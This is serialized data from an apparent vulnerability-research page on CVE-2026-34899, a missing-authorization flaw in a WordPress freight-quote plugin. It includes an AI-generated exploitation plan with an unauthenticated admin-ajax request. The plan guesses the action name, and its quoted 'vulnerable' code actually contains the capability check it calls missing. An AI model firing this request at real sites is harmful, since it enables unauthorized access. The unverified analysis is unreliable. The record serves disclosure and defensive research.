[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEHtDZTAsYvRi2wCTdEq0gaI1MKR9RbEjX-6NIhu6JCA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-34899","ltl-freight-quotes-worldwide-express-edition-missing-authorization","LTL Freight Quotes – Worldwide Express Edition \u003C= 5.2.1 - Missing Authorization","The LTL Freight Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.2.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ltl-freight-quotes-worldwide-express-edition",null,"\u003C=5.2.1","5.2.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 00:00:00","2026-04-15 19:48:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda62021a-6741-4054-8f33-f829b1854318?source=api-prod",9,[22,23,24],"fdo\u002Fen-va.php","readme.txt","woocommercefrieght.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-34899\n\n## 1. 
Vulnerability Summary\nThe **LTL Freight Quotes – Worldwide Express Edition** plugin (\u003C= 5.2.1) is vulnerable to **Missing Authorization**. The function `EnSpeedfreightVa::get_va_coupon_data` in `fdo\u002Fen-va.php` lacks a sufficient capability check (or the check is bypassable\u002Fmissing in version 5.2.1) and is exposed via a WordPress AJAX action. This allows unauthenticated attackers to trigger an API synchronization process that updates the WordPress database (`update_option`) and discloses sensitive promotional data, including coupons and registration URLs.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `get_va_coupon_data` (inferred from method name) or `wwe_get_va_coupon_data`.\n*   **Method:** `POST` or `GET`.\n*   **Authentication:** None required (vulnerable via `wp_ajax_nopriv_` registration).\n*   **Preconditions:** The WordPress option `en_va_coupon_data` should be empty (default state) for the `update_option` side effect to trigger.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a request to `admin-ajax.php` with the `action` parameter set to the hook associated with `get_va_coupon_data`.\n2.  **Hook Execution:** WordPress executes the callback registered to `wp_ajax_nopriv_[action]`, which maps to `EnSpeedfreightVa::get_va_coupon_data()`.\n3.  **Vulnerable Function (`fdo\u002Fen-va.php`):**\n    *   `get_va_coupon_data()` is called.\n    *   In the vulnerable version (5.2.1), the `current_user_can('manage_options')` check is either missing or bypassed.\n    *   The function checks if `get_option('en_va_coupon_data')` is empty.\n    *   If empty, it calls `$this->get_va_coupon_data_from_api()`.\n    *   `get_va_coupon_data_from_api()` makes an outbound request to `https:\u002F\u002Fvalidate-addresses.com\u002Fuse_coupon`.\n    *   The response is decoded, and if a `promo` key exists, `update_option('en_va_coupon_data', $va_coupon_data)` is called.\n4.  
**Information Disclosure:** The function then calls `$this->get_va_coupon_parsed_data($va_coupon_data)`, which returns an array containing `coupon`, `status`, and `register_url`. This data is then echoed back to the attacker (usually as JSON).\n\n## 4. Nonce Acquisition Strategy\nBased on the provided source for `fdo\u002Fen-va.php`, the `get_va_coupon_data` function **does not** perform any nonce verification (e.g., `check_ajax_referer` or `wp_verify_nonce`). \n\n**Exploitation does not require a nonce.**\n\n## 5. Exploitation Strategy\n\n### Step 1: Confirm AJAX Action\nThe researcher should first identify the exact AJAX action string.\n```bash\n# Search for the AJAX registration in the plugin directory\ngrep -r \"get_va_coupon_data\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-worldwide-express-edition\u002F\n```\n*Expected output:* Look for `add_action('wp_ajax_nopriv_...', ...)` or similar. We will assume the action is `get_va_coupon_data`.\n\n### Step 2: Trigger Unauthorized Sync\u002FDisclosure\nPerform an unauthenticated request to the AJAX endpoint.\n\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=get_va_coupon_data\n```\n\n### Step 3: Analyze Response\nA successful exploit will return a JSON object containing coupon information.\n```json\n{\n    \"coupon\": \"PROMO123\",\n    \"status\": 1,\n    \"va_user\": false,\n    \"va_company_id\": false,\n    \"va_company_text\": \"\",\n    \"register_url\": \"https:\\\u002F\\\u002Fvalidate-addresses.com\\\u002Fregister?code=...\",\n    \"login_url\": \"https:\\\u002F\\\u002Fvalidate-addresses.com\\\u002Flogin?code=...\"\n}\n```\n\n## 6. Test Data Setup\n1.  Install and activate **LTL Freight Quotes – Worldwide Express Edition 5.2.1**.\n2.  Ensure no configuration has been performed (the option `en_va_coupon_data` should be non-existent or empty).\n3.  
Optionally, verify the option state via WP-CLI:\n    ```bash\n    wp option get en_va_coupon_data\n    ```\n    *Result: \"Error: Could not find 'en_va_coupon_data' option.\"*\n\n## 7. Expected Results\n*   The `admin-ajax.php` request returns a JSON response containing the coupon data fetched from the Eniture API.\n*   The WordPress database is modified: the `en_va_coupon_data` option is populated with the API response.\n*   No authentication or nonces are required.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the database state using WP-CLI:\n```bash\n# Check if the option was created\u002Fupdated\nwp option get en_va_coupon_data\n```\n*Expected Result:* A JSON string containing promotional data.\n\n## 9. Alternative Approaches\nIf the direct `get_va_coupon_data` action name is incorrect, search `woocommercefrieght.php` for any `add_action` calls that reference the `EnSpeedfreightVa` class or the `fdo\u002Fen-va.php` file. \n\nIf the site is already configured (option not empty), the `update_option` call will not trigger, but the **Information Disclosure** (returning the existing coupon data) will still occur, which is sufficient to demonstrate the Missing Authorization vulnerability.","The LTL Freight Quotes – Worldwide Express Edition plugin for WordPress is vulnerable to unauthorized access because it exposes internal coupon synchronization logic via an AJAX action without sufficient capability checks or nonce verification. 
This allows unauthenticated attackers to disclose sensitive promotional data and trigger unauthorized updates to the plugin's configuration in the database.","\u002F\u002F fdo\u002Fen-va.php\n\n    \u002F**\n     * Function which is responsible to return va coupon data\n     *\u002F\n    public function get_va_coupon_data(){\n\n        if (!current_user_can('manage_options')) {\n            echo json_encode([]);\n            return;\n        }\n\n        $va_coupon_data = get_option('en_va_coupon_data');\n        if(empty($va_coupon_data)){\n            try{\n                $va_coupon_data = $this->get_va_coupon_data_from_api();\n                $data_decoded = json_decode($va_coupon_data);\n                if(isset($data_decoded->promo)){\n                    update_option('en_va_coupon_data', $va_coupon_data);\n                }else{\n                    return [];\n                }\n            }catch(Exception $e){\n                return [];\n            }\n        }\n\n        return $this->get_va_coupon_parsed_data($va_coupon_data);\n    }","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1: en-hit-to-update-plan.php\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Ffdo: en-va.php\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Freadme.txt\t2026-03-02 06:46:16.000000000 +0000\n+++ 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Freadme.txt\t2026-03-03 11:50:38.000000000 +0000\n@@ -3,7 +3,7 @@\n Tags: eniture. worldwide express,LTL freight rates, LTL freight quotes,shipping rates\n Requires at least: 6.4\n Tested up to: 6.9\n-Stable tag: 5.2.1\n+Stable tag: 5.2.2\n License: GPLv2 or later\n License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\n \n@@ -168,6 +168,9 @@\n \n == Changelog ==\n \n+= 5.2.2 - 2026-03-03 =\n+* Fix: Resolved Broken Access Control vulnerability to improve overall plugin security.\n+\n = 5.2.1 - 2026-03-02 =\n * Fix: Resolved JS files minification conflict with the WP Rocket plugin to ensure compatibility with asset optimization.\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Fwoocommercefrieght.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Fwoocommercefrieght.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.1\u002Fwoocommercefrieght.php\t2026-03-02 06:46:16.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-worldwide-express-edition\u002F5.2.2\u002Fwoocommercefrieght.php\t2026-03-03 11:50:38.000000000 +0000\n@@ -5,7 +5,7 @@\n   Description: Obtains a dynamic estimate of LTL Freight rates via the Worldwide Express Speedfreight API for your orders.\n   Author: Eniture Technology\n   Author URI: https:\u002F\u002Feniture.com\u002F\n-  Version: 5.2.1\n+  Version: 5.2.2\n   Text Domain: eniture-technology\n   License: GPLv2 or later\n   Requires Plugins: woocommerce","To exploit this vulnerability, an attacker identifies the AJAX action responsible for fetching 
coupon data (e.g., `get_va_coupon_data` or `wwe_get_va_coupon_data`). Because the function is registered via `wp_ajax_nopriv_` and lacks valid authorization or nonce checks in the affected versions, the attacker sends an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the corresponding `action` parameter. The server then executes `get_va_coupon_data`, which contacts the Eniture API, updates the `en_va_coupon_data` WordPress option if it is empty, and returns a JSON object containing the coupon code, registration URLs, and other promotional metadata to the attacker.","gemini-3-flash-preview","2026-04-17 21:13:42","2026-04-17 21:14:44",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.2.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags\u002F5.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-worldwide-express-edition.5.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags\u002F5.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-worldwide-express-edition.5.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-worldwide-express-edition\u002Ftags"]